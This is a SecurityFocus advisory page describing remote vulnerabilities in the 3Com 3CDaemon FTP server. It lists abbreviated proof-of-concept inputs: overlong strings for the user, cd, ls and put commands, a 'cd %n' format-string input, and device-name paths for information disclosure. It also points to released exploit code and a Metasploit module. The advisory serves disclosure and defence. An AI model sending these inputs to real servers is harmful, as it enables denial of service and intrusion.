3Com 3CDaemon Multiple Remote Vulnerabilities

The following proof of concept is available:

Buffer overflows:
user AAA..[about 241 A here]...AAAAA
cd AAA..[about 398 A here]...AAAAA
ls AAA..[about 247 A here]...AAAAA
put 1.txt AAA..[about 247 A here]...AAAAA
Format string:
cd %n
Information disclosure:
cd aux
cd lpt1
cd toolz.rar

Exploit code 3cdaemon_exp.c has been provided by c0d3r "kaveh razavi" <c0d3rz_team@yahoo.com>.

An exploit written by H D Moore <hdm [at] metasploit.com>, '3com_3cdaemon_ftp_overflow.pm', has been released as part of the Metasploit Framework.


 

Privacy Statement
Copyright 2010, SecurityFocus